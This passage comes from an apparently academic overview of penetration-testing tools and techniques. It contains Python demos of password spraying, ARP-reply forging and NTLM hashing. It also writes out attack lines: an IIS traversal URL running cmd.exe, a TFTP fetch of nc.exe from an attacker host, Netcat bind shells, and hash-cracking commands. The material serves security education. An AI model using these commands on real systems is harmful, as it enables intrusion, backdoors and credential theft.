information gathered is a vulnerability. The tool also makes no attempt at stealth, so it can also
be used to test intrusion detection systems (IDS) and/or intrusion prevention systems (IPS). In
Kali Linux, the command 'nikto -Help' shows a list of options for scanning, format, display,
configuration, authentication, and other features that can be found in Figures 1 and 2. Figures 1
and 2 are in Appendix B (Sullo, 2019).
A popular, effective and widely used web application security testing tool is Burp Suite,
an intercepting proxy that allows a user to capture and modify HTTP and HTTPS traffic.
The tool allows for security testing by manipulating the captured requests and responses, which
carry the parameters, headers and cookies the web application relies on. Intercepting traffic is
performed by configuring the attacker's browser to use Burp Suite as its proxy and then
activating Burp Suite's intercept mode, so that each HTTP request is held and displayed as
editable text before it reaches the website, and each response before it reaches the browser
(Sharma, 2017, pp. 63-71).
One use case for Burp Suite during security testing is capturing the POST requests for a
successful and a failed login and using those results in conjunction with the Hydra tool for
credential testing. A POST request is sent to the web application when a user inputs information
on the website and submits it; an example would be clicking login after entering a username and
password. The process is to take the request path, the form parameter names and the text that
distinguishes a failed login from Burp Suite, and supply them to Hydra's http-post-form module
together with a username file and a password file, so that Hydra can test which username and
password pairs authenticate successfully. This is a faster method than manually testing usernames
and passwords in the browser (Sharma, 2017, pp. 63-71).
An Outlook Web App (OWA) login page is a popular place to perform password spraying
attacks, as OWA is usually backed by users' domain credentials. One of the issues in performing
a brute-force attack is the account lockout policy: when a password has been entered incorrectly
too many times the account is locked out, so the attacker can no longer try passwords
indefinitely. Password spraying works around the lockout limit by trying one strategically chosen
password against every account in the organization's domain before moving on to the next
password, so each account receives only one failed attempt per round and stays below the lockout
threshold (Najera-Gutierrez & Ansari, 2018, pp. 149-156).
Before performing the password spray, it is important to obtain the username format or
email address format of the organization, which is usually done during OSINT and
HUMINT. When choosing the password for a spray against OWA accounts, it is important for the
tester to understand and know common passwords. An example of a commonly used password is the
current season and the year, such as Winter2019 (Najera-Gutierrez & Ansari, 2018, pp. 149-156).
That ten-character password contains uppercase letters, lowercase letters and digits, so it
satisfies the eight-character minimum with mixed character classes that many organizations require.
In order to perform the attack, the attacker visits the OWA login page, attempts and fails a
login while capturing the POST request, and sends the captured request to Burp Suite's Intruder,
where the attack type 'sniper' is selected and the payload position is marked. The payload
position is the username or email field, because that is the only value that changes during the
attack: the same password is used against all accounts to reduce the risk of account lockouts
(Najera-Gutierrez & Ansari, 2018, pp. 149-156).
Once the password is entered, the attacker imports the list of possible usernames or email
addresses that were found and/or generated during OSINT and HUMINT. In some circumstances, the
tester must set Burp Suite to follow redirects and process cookies for the attack to succeed,
since OWA answers a login with a redirect and a session cookie. Once the settings and
configurations are set, the attack can be launched. Cookies are saved by the user's browser and
contain information such as the session ID, user ID and other text. Websites use cookies to
maintain a session with a browser so that the user does not have to re-authenticate as other URLs
are loaded (Najera-Gutierrez & Ansari, 2018, pp. 149-156).
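The following is an added example, not code from the paper or from Burp Suite or Hydra, of the lockout-aware logic behind the spray just described. A constructed mock directory stands in for OWA and a fake clock makes the run instantaneous; the user names, passwords, lockout threshold and observation window are assumptions. The sprayer tries one password per round across all accounts and waits whenever an account would otherwise cross the threshold inside the window, and a naive single-account brute force is included to show the lockout it triggers.

```python
from typing import Callable, Dict, List, Set, Tuple


class FakeClock:
    """Constructed clock so the example runs instantly; use time.monotonic/time.sleep live."""
    def __init__(self) -> None:
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


class MockDirectory:
    """Stand-in for the OWA/domain login with a lockout policy (constructed, not a real service).
    An account locks after `threshold` failures inside `window` seconds."""
    def __init__(self, creds: Dict[str, str], threshold: int, window: float, clock: FakeClock) -> None:
        self.creds, self.threshold, self.window, self.clock = creds, threshold, window, clock
        self.failures: Dict[str, List[float]] = {u: [] for u in creds}
        self.locked: Set[str] = set()

    def login(self, user: str, password: str) -> bool:
        if user not in self.creds or user in self.locked:
            return False
        if self.creds[user] == password:
            return True
        now = self.clock.now()
        recent = [t for t in self.failures[user] if now - t < self.window] + [now]
        self.failures[user] = recent
        if len(recent) >= self.threshold:
            self.locked.add(user)
        return False


def spray(users: List[str], passwords: List[str], auth: Callable[[str, str], bool],
          threshold: int, window: float, now: Callable[[], float],
          sleep: Callable[[float], None]) -> List[Tuple[str, str]]:
    """One password against every account per round. Before each attempt, keep the account
    below threshold-1 failures inside the observation window; if it is at the limit, wait
    for the oldest failure to age out instead of risking a lockout."""
    assert threshold >= 2, "a threshold of 1 leaves no safe attempt"
    hits: List[Tuple[str, str]] = []
    failures: Dict[str, List[float]] = {u: [] for u in users}
    for password in passwords:
        for user in users:
            failures[user] = [t for t in failures[user] if now() - t < window]
            while len(failures[user]) >= threshold - 1:
                sleep(window - (now() - failures[user][0]))
                failures[user] = [t for t in failures[user] if now() - t < window]
            if auth(user, password):
                hits.append((user, password))
            else:
                failures[user].append(now())
    return hits


def naive_bruteforce(user: str, passwords: List[str], auth: Callable[[str, str], bool]) -> List[str]:
    """What NOT to do on a domain with lockouts: every password against one account."""
    return [pw for pw in passwords if auth(user, pw)]


def run_demo(threshold: int = 5, window: float = 1800.0):
    """Spray three seasonal guesses at three constructed accounts.
    Returns (hits, locked accounts, simulated seconds elapsed)."""
    clock = FakeClock()
    directory = MockDirectory({"alice": "x7#Qp!2v", "bob": "Winter2019", "carol": "9Lm$kz0W"},
                              threshold, window, clock)
    hits = spray(["alice", "bob", "carol"], ["Summer2019", "Fall2019", "Winter2019"],
                 directory.login, threshold, window, clock.now, clock.sleep)
    return hits, set(directory.locked), clock.now()


def run_naive_demo(threshold: int = 5, window: float = 1800.0):
    """Six guesses at one account: the correct one arrives after the lockout and is refused."""
    clock = FakeClock()
    directory = MockDirectory({"alice": "x7#Qp!2v"}, threshold, window, clock)
    guesses = ["Summer2019", "Fall2019", "Winter2019", "Password1", "Welcome1", "x7#Qp!2v"]
    return naive_bruteforce("alice", guesses, directory.login), set(directory.locked)
```

For a live engagement the mock login is replaced by the HTTP POST captured in Burp, and time.monotonic and time.sleep are passed as the clock. The threshold and window must match the target's real lockout policy, which is a good reason to ask for that policy in the rules of engagement rather than guess it.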
Most web applications are backed by relational databases that are queried with Structured
Query Language (SQL), a language used for database communication and queries. Because web
applications build SQL queries from user input, SQL injection is a common flaw, and the SQLMap
tool, included in the Kali Linux distribution by default, is a popular tool for testing for it.
SQLMap supports many database management systems and offers enumeration, fingerprinting, and
takeover options when vulnerabilities allow. The specifics regarding what tasks the tool can
perform are listed on its official GitHub page. The range of options and capabilities that the
tool offers makes it a great tool to use during web application security testing, and it should
be included in any penetration tester's tool suite (Stamparm, 2014).
Intranet
Scanning and discovery. The Internet and an Intranet are two different types of networks.
The Internet is a computer communications network that connects servers and computers around
the world (Merriam-Webster, 2019). An Intranet is a private network that connects computers and
servers within one or several local area networks (LANs); it is not reachable from the Internet,
even though its hosts may reach the Internet through an Internet Service Provider (ISP).
When a tester has access to a target organization's Intranet, they generally can establish a
network connection to other devices on that organization's Intranet. Access to an
organization's Intranet can occur in a couple of different ways. One way to get a network
connection is to establish a physical connection to the network using an ethernet cable to an
ethernet port in the office of the organization. Another way is to get wireless network access
through a connection to the wireless access point (Fadyushin & Popov, 2016, pp. 154-159).
Once the tester is on the network, discovery of devices on the network and enumeration
of those devices are the next steps in performing a penetration test. Reconnaissance is the
part of the preparation phase in which the tester gathers as much information as possible about
the target before launching an attack. During the reconnaissance phase, the tester will utilize
different intelligence sources to learn more about the target organization. The phase may also
involve internal and/or external network scanning (EC-Council Press, 2017, p. 9).
When a tester needs to perform discovery scanning and enumeration on a network, Nmap
is the tool of choice; few open-source tools match the capabilities that Nmap provides. An
example of an Nmap command is nmap -A -v -O -sC 192.168.0.16 -oG scan.txt. The nmap portion at
the beginning invokes the Nmap program. The options -A, -v, -O and -sC tell Nmap what actions to
perform against the IP address or network range: -A enables aggressive scanning, which already
includes OS detection (-O), the default scripts (-sC), version detection and traceroute, and -v
increases verbosity. The -oG option sets the output format, where 'o' stands for output and 'G'
stands for grepable, a one-line-per-host format that allows the use of grep to search for
keywords within the file. The last portion, scan.txt, names the file that the output is written
to (Lyon, 2008). Table 1, found in Appendix A, shows an example list of some basic Nmap options.
The mentioned examples only show syntax and not all the ways that Nmap can be used; the
Nmap reference guide shows the tool's versatility in a variety of scenarios. Depending on what
the tester is trying to achieve, there are multiple ways to run Nmap. To perform a basic ping
scan of a network or range of IP addresses, the following command can be utilized:
nmap -sP -n 10.0.0.1-254 (Lyon, 2008).
The -sP portion of the command asks Nmap to ping the IP addresses to determine whether the
devices are online (newer Nmap versions call this option -sn), and the -n tells Nmap not to
attempt domain name resolution. With the small amount of data that Nmap is required to gather
during this scan, the scan is fast. To gather a little more data, a tester can replace -sP with
-sT, which tells Nmap to run a TCP connect scan of the 1,000 most common TCP ports on each
device. This is where port scanning comes into play (Lyon, 2008).
Port scanning is critical after initial discovery has been completed. As an example, if a
ping scan was performed and only one IP address was found to be online, the next step is to
perform enumeration of that device. To choose which ports to probe, the -p option is used; to
scan the entire range of ports on the device, the option is -p-. Once the tester knows which
ports are open, they can run Nmap with the -sV option, which tells Nmap to determine the version
of the services running on those ports. Depending on the version of the running services, there
could be known exploitable vulnerabilities. The difficulty with Intranet scanning is the risk of
getting caught by IDS and IPS. One basic method that lowers the profile of host discovery is
address resolution protocol (ARP) scanning, selected with the -PR option, which discovers devices
on the local area network with ARP requests instead of ICMP or TCP probes. ARP traffic never
leaves the local broadcast domain and is rarely logged, so it is less likely to alert a network
IDS, and Nmap uses it automatically when the targets are on the local Ethernet segment. There
are multiple ways of performing these steps in Nmap, and there are more Nmap options available
to assist in discovery and enumeration while remaining stealthy (Lyon, 2008).
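As an added example (not from the paper or from the Nmap project), the parser below reads the grepable (-oG) output discussed above so that the tester can ask the questions grep is usually used for, such as which hosts expose a given service and with what version. The scan output is a constructed sample in Nmap's real grepable layout, not the result of a real scan.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of Nmap -oG output (not a real scan). Fields within a host line are
# tab-separated; each port entry is port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.80 scan initiated Mon Dec  2 10:00:00 2019 as: nmap -sV -oG scan.txt 192.168.0.0/24",
    "Host: 192.168.0.1 (gw.lan)\tStatus: Up",
    "Host: 192.168.0.1 (gw.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, "
    "80/open/tcp//http//nginx 1.14.0/, 443/filtered/tcp//https///\tIgnored State: closed (997)",
    "Host: 192.168.0.16 ()\tStatus: Up",
    "Host: 192.168.0.16 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 - 2012 microsoft-ds/, "
    "3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (998)",
    "# Nmap done at Mon Dec  2 10:03:12 2019 -- 256 IP addresses (2 hosts up) scanned in 192.10 seconds",
])

HOST_RE = re.compile(r"Host: (\S+) \(([^)]*)\)")


def parse_gnmap(text: str) -> Dict[str, dict]:
    """Parse -oG output into {ip: {"hostname", "up", "ports": [...]}}.
    Nmap writes any '/' inside a version string as '|', which is reversed here."""
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and the 'Nmap done' trailer
        chunks = line.split("\t")
        m = HOST_RE.match(chunks[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        host = hosts.setdefault(ip, {"hostname": hostname, "up": False, "ports": []})
        for chunk in chunks[1:]:
            key, _, value = chunk.partition(": ")
            if key == "Status":
                host["up"] = value == "Up"
            elif key == "Ports":
                host["up"] = True
                for entry in value.split(", "):
                    f = entry.split("/")
                    host["ports"].append({"port": int(f[0]), "state": f[1], "proto": f[2],
                                          "service": f[4], "version": f[6].replace("|", "/")})
    return hosts


def open_services(hosts: Dict[str, dict]) -> List[Tuple[str, int, str, str]]:
    """Which host runs what on which port: the question the grepable format exists for."""
    return [(ip, p["port"], p["service"], p["version"])
            for ip, h in hosts.items() for p in h["ports"] if p["state"] == "open"]


def hosts_with_service(hosts: Dict[str, dict], service: str) -> List[str]:
    """Hosts exposing a named service on an open port, e.g. every SMB server for enum4linux."""
    return sorted(ip for ip, h in hosts.items()
                  if any(p["state"] == "open" and p["service"] == service for p in h["ports"]))


if __name__ == "__main__":
    for row in open_services(parse_gnmap(SAMPLE_GNMAP)):
        print(row)
```

The version field feeds the next step the passage describes: once the parser has "OpenSSH 7.4" or "nginx 1.14.0" per host, those strings are what get checked against vulnerability databases, and hosts_with_service(hosts, "microsoft-ds") is the list to hand to enum4linux.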
In order to avoid detection by IDS and IPS on an Intranet, an attacker needs to blend in
with normal traffic. When scanning a network, it is important to limit the rate of packets
sent from the tester's computer so the scan looks more like normal traffic rather than a scan of
the network (Allen & Cardwell, 2016, pp. 331-344). Nmap can throttle its timing, spoof the
source IP address, spoof the MAC address, and change other packet parameters. Using a
combination of the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning
(Beggs, 2017, pp. 66-72).
Depending on the situation, poisoning ARP caches is a viable way to perform certain
attacks that give the penetration tester information that can be utilized to compromise a system or
network. The tool Cain and Abel can perform ARP poisoning after the pentester has placed
their NIC or WNIC in promiscuous mode and obtained a list of the devices by sniffing traffic on
the network. After obtaining the list of devices, the tester determines which host they want to
intercept and filters the sniffing tool to show only that device's traffic. Cain and Abel performs
a man-in-the-middle attack by sending the victim machine a forged ARP reply that maps the default
gateway's IP address to the attacker's MAC address, and sending the default gateway a forged ARP
reply that maps the victim's IP address to the attacker's MAC address. At this point, the victim
machine thinks the pentester is the default gateway and the default gateway thinks the penetration
tester is the victim machine, so traffic in both directions passes through the tester's host. Cain
and Abel then captures the packets, forwards them so the connection stays up, and analyzes them
for credentials, PII, and other sensitive information (Sanders, 2017, pp. 28-30). Figure 3, found
in Appendix B, shows a graphical representation of an ARP table before and after ARP poisoning.
Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is
easiest on a hub rather than a switch. A hub operates on the first (physical) layer of the OSI
model and repeats every frame out of every port all the time, which makes sniffing the network
trivial. A switch operates on the second (data link) layer of the OSI model and forwards each
frame only to the port where it has learned the destination MAC address resides. Poisoning the
ARP caches of the other hosts, so that they map the default gateway's IP address to the tester's
MAC address, forces the other devices on the LAN to send everything that leaves the LAN through
the tester's computer, which recreates the visibility of a hub. For this to work the tester's
machine must forward the traffic on to the real gateway (for example by enabling IP forwarding or
by letting the poisoning tool relay it); Wireshark itself only captures the packets as they pass
through the interface. Just like Cain and Abel, Wireshark can then be used to analyze the packets
offline for credentials, keys, and any other sensitive information (Ali, Allen, & Heriyanto,
2014, pp. 323-327).
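To make the Cain and Abel and Wireshark descriptions above concrete, the added example below (not code from either tool or from the paper) builds the two forged ARP replies that an ARP-poisoning tool sends and pairs them with the detection logic a defender would run over the same frames. The MAC and IP addresses are constructed; the frame layout is the real Ethernet II / ARP encoding. The block only builds frames as bytes and sends nothing.

```python
import struct
from typing import List, Optional, Tuple

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def ip(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def arp_frame(op: int, sender_mac: bytes, sender_ip: bytes, target_mac: bytes, target_ip: bytes) -> bytes:
    """Ethernet II header (14 bytes) + ARP payload for Ethernet/IPv4 (28 bytes) = 42 bytes."""
    ethernet = target_mac + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # htype, ptype, hlen, plen, opcode
           + sender_mac + sender_ip + target_mac + target_ip)
    return ethernet + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Return the ARP fields of a frame, or None if it is not an ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    op = struct.unpack("!HHBBH", frame[14:22])[4]
    return {"op": op, "sha": frame[22:28], "spa": frame[28:32], "tha": frame[32:38], "tpa": frame[38:42]}


def poison_pair(attacker_mac: bytes, victim_mac: bytes, victim_ip: bytes,
                gateway_mac: bytes, gateway_ip: bytes) -> Tuple[bytes, bytes]:
    """The two unsolicited replies an ARP-poisoning tool sends: the victim is told the gateway's
    IP lives at the attacker's MAC, and the gateway is told the victim's IP does."""
    to_victim = arp_frame(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = arp_frame(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


class ArpWatch:
    """Defender's side: remember the first MAC seen for each IP and flag any reply that changes it."""
    def __init__(self) -> None:
        self.table: dict = {}

    def observe(self, frame: bytes) -> Optional[str]:
        a = parse_arp(frame)
        if a is None or a["op"] != ARP_REPLY:
            return None
        known = self.table.setdefault(a["spa"], a["sha"])
        if known != a["sha"]:
            return (f"ARP conflict: {fmt_ip(a['spa'])} was {fmt_mac(known)}, "
                    f"now claimed by {fmt_mac(a['sha'])}")
        return None


def demo() -> List[str]:
    """Constructed LAN: gateway and victim exchange genuine replies, then the attacker poisons both."""
    gw_mac, gw_ip = mac("00:11:22:33:44:01"), ip("192.168.0.1")
    victim_mac, victim_ip = mac("00:11:22:33:44:16"), ip("192.168.0.16")
    attacker_mac = mac("de:ad:be:ef:00:01")
    watch = ArpWatch()
    legit = [arp_frame(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip),
             arp_frame(ARP_REPLY, victim_mac, victim_ip, gw_mac, gw_ip)]
    alerts = [watch.observe(f) for f in legit]
    alerts += [watch.observe(f) for f in poison_pair(attacker_mac, victim_mac, victim_ip, gw_mac, gw_ip)]
    return [a for a in alerts if a]


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The detector is the same first-seen-wins rule that arpwatch and many switches' dynamic ARP inspection apply; its weakness, visible in the code, is that an attacker who replies before the legitimate host is seen is trusted, which is why production deployments seed the table from DHCP snooping or a static list rather than from the first frame observed.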
Network scanning and device enumeration are key during the early stages of a penetration
test and security analysis. When the network has been scanned and devices have been
footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a
tester during this stage. OpenVAS is a collection of security tools that perform
vulnerability management functions. It was developed for a client-server architecture, where the
clients request vulnerability scans from the server that performs the scans. Because OpenVAS is
modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014, pp. 323-327).
In summary, reconnaissance is required during preparation for an attack in order to learn
about the targets, and the discovery and enumeration phases draw on the intelligence it produces,
combining it with internal and external scanning of the in-scope networks.
Exploitation and gaining access. Gaining access to target devices requires the
exploitation of vulnerabilities found during the discovery and enumeration phases. There are two
main classifications of attacks. The first is a direct attack, where a target network's
vulnerabilities are exploited to gain access to potentially critical systems, or to obtain
information that can be used to launch indirect attacks. The second is an indirect attack, which
occurs when an attacker uses a sequence of attacks, typically through the organization's people,
to compromise the targets. Examples are spear phishing and watering-hole attacks (Sood & Enbody,
2014, pp. 37-44).
Patel (2013) references the Social Engineering Toolkit (SET), which is installed by
default on the Kali Linux distribution and is a diverse toolset for social engineering attacks. The
toolkit is capable of creating emails and malicious attachments and of creating and hosting
phishing web pages, also known as a web attack vector. SET contains a mass-mailer option with
which a penetration tester can send a phishing email to many email addresses within an
organization at once (Patel, 2013, pp. 37-44).
SET has a list of website templates that can be used as a web attack vector, but it is
also capable of cloning websites when a URL is provided. The tool performs a GET request,
grabs the HTML of the page, and builds the clone from that information. Using tools like SET can
assist in testing the employees of an organization and their ability to recognize phishing email
attempts. If a user gives up the login credentials of a website, such as their work Office 365
login, the penetration tester has the user's credentials for their organization. If the user has
administrative permissions, either locally on their computer or on the domain, the penetration
tester will be able to utilize those credentials to gain access to the organization's network
(Patel, 2013, pp. 37-44).
When looking for information on a machine or for ways to access a machine, the tool
enum4linux is a great source for enumerating Windows and Samba hosts over the server message
block (SMB) and RPC services; it wraps the Samba utilities smbclient, rpcclient, net and
nmblookup. Using valid non-administrative or administrative credentials, it is possible to find an
accessible SMB share and, depending on the permissions, find a share that can be modified or even
used to execute remote commands. If a domain controller is enumerated, the penetration tester
could obtain a list of all Active Directory (AD) users, groups, devices and shares. This is a step
to perform either during enumeration and/or post exploitation. If the tester does not have a
username and password, it is still possible to find shares and information open to the 'Everyone'
group or available over a null session. The 'Everyone' group can be an AD or local group and
allows anyone to access the resource it is assigned to, regardless of whether they have an Active
Directory account. In the instance of a file share that members of 'Everyone' can access, a tester
can list and read the share's contents without any credentials. If the tester has already
exploited and compromised a workstation and/or has credentials, those credentials can be used to
discover and access more shares on a network depending on the permissions of the compromised
credentials. Output for the enum4linux help page (enum4linux -h) can be found in Figure 4,
located in Appendix B (Velu, 2017, pp. 124-125).
In the realm of exploitation, Metasploit is the most commonly used tool for executing
exploits against known vulnerabilities. There are two editions of Metasploit: Metasploit Pro,
which is the paid edition and requires a license, and Metasploit Framework, which is free and is
installed by default in Kali Linux. "Metasploit is currently the world's leading
penetration-testing tool, and one of the biggest open-source projects in information security and
penetration testing. It has totally revolutionized the way we can perform security tests on our
systems" (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, which is a managed security services
provider (MSSP) and security product vendor, owns Metasploit Pro and Framework (Condon, 2019).
The Metasploit Framework (MSF) is organized into directories of modules. Each
directory holds modules that serve a specific purpose, whether it is scanning, auxiliary
functions, exploitation, or post-exploitation. When a penetration tester is trying to gain access
to a device, the extensive library of exploitation modules in Metasploit Framework is second to
none. The module library is constantly being updated. The command for updating MSF is
'msfupdate' (on Kali Linux the package manager, apt, is the supported way to update it). The
tool can also be installed on Windows and macOS (Teixeira, Singh, & Agarwal, 2018, pp. 8-17).
Metasploit Framework modules are selected with the 'use' command followed by the
path of the module that is needed. MSF users can perform keyword searches of modules by
typing 'search' followed by the keyword they are looking for. As an example, typing
'search SQL' and pressing enter lists all of the modules that include SQL in the name or
description of the module. Before a module is executed with the command 'run' (or 'exploit'),
its options, such as the target host (RHOSTS), must be set with 'set'. See Figure 5, located in
Appendix B, for an example of setting and executing a Metasploit module (Teixeira, Singh, &
Agarwal, 2018, pp. 8-17).
Persistence and spreading. Spreading across the network includes gaining access to
other servers, workstations and whole networks once the penetration tester has gained access to
one or more devices. Persistence involves setting up a backdoor into the machine or machines for
future access.
EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures:
Web Application and Data Servers. The Netcat chapter of the book provides the reader with
steps to set up a backdoor on a compromised computer using either TFTP or an injected URL. An
example is sending a vulnerable IIS web server the following URL:
http://192.168.0.1/scripts/...%255c./winnt/system32/cmd.exe?/c+dir+c:\ (EC-Council, 2017, p.
54). The double-encoded path separator (%255c) walks out of the scripts directory, and the URL
asks the web server to run Windows' cmd.exe and show the attacker the listing of the C drive.
Once the pentester can run commands on the target machine this way, the server's TFTP client can
be used to pull Netcat onto the Internet Information Services (IIS) server with the following
request: http://<attacker'sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe (EC-Council, 2017, p. 54).
The request, again routed through cmd.exe on the IIS server, runs the Windows tftp client with
-i (binary transfer) and GET nc.exe, which fetches nc.exe, the Netcat binary, from a TFTP server
that the tester runs. Once Netcat is on the IIS server, it can be executed as a backdoor that
listens on a specific port for commands from the attacker's computer. An example of such a
command is nc -L -p 12345 -d -e cmd.exe. Respectively, the options mean listen on port 12345 and
keep listening after a client disconnects (-L), detach from the console so no window is shown
(-d), and hand the connection to cmd.exe (-e) (EC-Council, 2017, p. 54).
If there is a file share that is open, or if the penetration tester has accessed a file share
with 'modify' permissions, it is possible to copy Netcat to the target device and start a remote
shell. Once Netcat is on the target, the pentester runs the following command on a Windows
machine: nc -l -p 6996 -e cmd.exe. For a Linux machine, the command is the same except that
cmd.exe is replaced with /bin/bash. The command nc calls Netcat, -l means listen, -p 6996 means
port 6996, and -e cmd.exe means to execute the named program and attach it to the connection.
This makes Netcat listen on the port and hand the terminal or command prompt to whoever
connects. Since Netcat is listening on port 6996 and will run the commands it receives in the
OS's command line interface (CLI), the penetration tester runs the following command on their
own device: nc <target IP> 6996. This initiates a Netcat connection between the tester's machine
and the target machine (Yerrid, 2013, pp. 33-35).
Because IIS can have remote code execution vulnerabilities, depending on the version of
IIS running, the penetration tester could utilize the Netcat tool to gain access to the server and
establish hidden persistence on a vulnerable server as part of a penetration test. This only gives
the tester the same permissions as the application running, so privilege escalation might be
required to gain administrative access to the Windows server (EC-Council, 2017, p. 54).
Mimikatz is a well-known tool that can perform a multitude of functions to assist in
escalating privileges, gaining further access, and gathering additional Active Directory
information regarding user accounts and group policies. Mimikatz is also known for its ability to
perform the infamous pass-the-hash attack, which exploits a design property of NTLM
authentication: the protocol proves knowledge of the NT hash rather than of the password itself,
so possessing the hash is enough to authenticate to Windows devices. It is not only important to
understand how NTLM functions and what tools can exploit its weaknesses; understanding how to use
the tool is essential for a penetration tester, and that is why the author gives several other
examples of the tool's use in real scenarios (Sharma, 2017, pp. 238-240).
Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT,
NTLMv1 and NTLMv2 hashes, and the tool syntax for John the Ripper and Hashcat for cracking
the mentioned hashes. Halton & Weaver (2016) explained the history of each hash and reviewed
steps for cracking the credentials in detail. LM hashes are the oldest hashes Windows used to
store passwords and are easily cracked due to their age and simplistic algorithm: the password is
upper-cased, padded to 14 characters and split into two 7-character halves, each of which is used
as a DES key to encrypt a fixed string, so the two halves can be cracked independently. The NT
hash, also known as NTHash, is an MD4 digest of the UTF-16LE encoded password; it is harder to
crack than LM and is standard on all modern Windows machines. Luckily, cracking this hash is not
always necessary. NTLM's most notable weakness is the pass-the-hash technique, where an attacker
who has dumped the NT hash from a compromised machine can use it directly to answer the NTLM
challenge-response, because the response is computed from the hash rather than from the
password. The server or domain controller validates the response against the stored hash, so a
correct hash is accepted as valid credentials. LM and NT hashes are the formats in which Windows
stores passwords on the machine itself, in the SAM database or in Active Directory.
The commands to crack LM hashes with Hashcat and JTR, given a file of hashes (hashes.txt) and a
wordlist (wordlist.txt), are as follows:
Hashcat: hashcat -m 3000 -a 0 hashes.txt wordlist.txt (Steube, 2019)
John the Ripper: john --format=lm --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016, pp. 223-225)
The commands for cracking NT hashes with Hashcat and JTR are as follows:
John the Ripper: john --format=nt --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016, pp. 223-225)
Hashcat: hashcat -m 1000 -a 0 hashes.txt wordlist.txt (Steube, 2019).
NTLMv1, also known as Net-NTLMv1, is a challenge-response protocol that allows Windows
machines to authenticate to a domain or to another host over the network. This is an older
version of network authentication and is now deprecated, but older networks or networks with
older hardware/software may still be using this version. NTLMv2 is the more secure version and
has been the default method since Windows 2000 (Clercq, 2004). Both protocols derive the response
from the NT hash and the server's challenge, so a captured exchange can be cracked offline by
guessing passwords.
The commands for cracking captured NTLMv1 exchanges are as follows: John the Ripper:
john --format=netntlm --wordlist=wordlist.txt hashes.txt; Hashcat: hashcat -m 5500 -a 0
hashes.txt wordlist.txt. The commands for cracking NTLMv2 exchanges are as follows: John the
Ripper: john --format=netntlmv2 --wordlist=wordlist.txt hashes.txt; Hashcat: hashcat -m 5600 -a 0
hashes.txt wordlist.txt (Steube, 2019).
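The following example was added for this edit and is not code from the cited authors, Hashcat or John the Ripper. It implements the hashes that the commands above crack, so the difference between an NT hash and a Net-NTLMv2 response is visible in code: the NT hash is MD4 of the UTF-16LE password (the value pass-the-hash reuses), and the NTLMv2 response is an HMAC-MD5 chain keyed by that hash over the server challenge and a client blob, both of which cross the network in the clear, which is why a captured exchange can be cracked offline. The user, domain, challenge and blob values are constructed, and the "captured" hashcat -m 5600 line is generated from them rather than taken from a real network. MD4 is implemented in pure Python because hashlib omits it on many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(message: bytes) -> bytes:
    """MD4 per RFC 1320. Written out because hashlib.new('md4') is missing on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = (message + b"\x80" + b"\x00" * ((55 - len(message)) % 64)
              + struct.pack("<Q", 8 * len(message)))
    for off in range(0, len(padded), 64):
        X = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = state
        for func, order, shifts, const in rounds:
            for n, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[n % 4])
                a, b, c, d = d, a, b, c   # rotate roles so the next step updates the next register
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash (NTHash): MD4 of the UTF-16LE password. Stored in the SAM and in AD; reused as-is by pass-the-hash."""
    return md4(password.encode("utf-16le"))


def netntlmv2(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr of an NTLMv2 response. The NTLMv2 hash keys HMAC-MD5 over the challenge and
    the client blob; both travel in the clear, so a captured exchange is crackable offline."""
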